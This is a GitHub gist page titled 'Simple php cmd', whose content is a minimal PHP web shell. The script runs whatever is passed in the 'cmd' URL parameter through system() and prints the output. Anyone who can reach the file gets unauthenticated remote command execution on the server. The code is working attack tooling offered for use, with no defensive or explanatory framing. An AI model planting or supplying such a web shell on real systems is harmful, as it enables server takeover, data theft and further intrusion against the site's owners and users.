Skip to content

Instantly share code, notes, and snippets.

@sshgun
Last active April 25, 2020 13:45
Show Gist options
  • Save sshgun/f1540cc7767569a4eb1282fa3c902019 to your computer and use it in GitHub Desktop.
Save sshgun/f1540cc7767569a4eb1282fa3c902019 to your computer and use it in GitHub Desktop.
Simple php cmd
<?php
if (isset($_GET['cmd'])) {
echo "<pre>";
$cmd = ($_GET['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment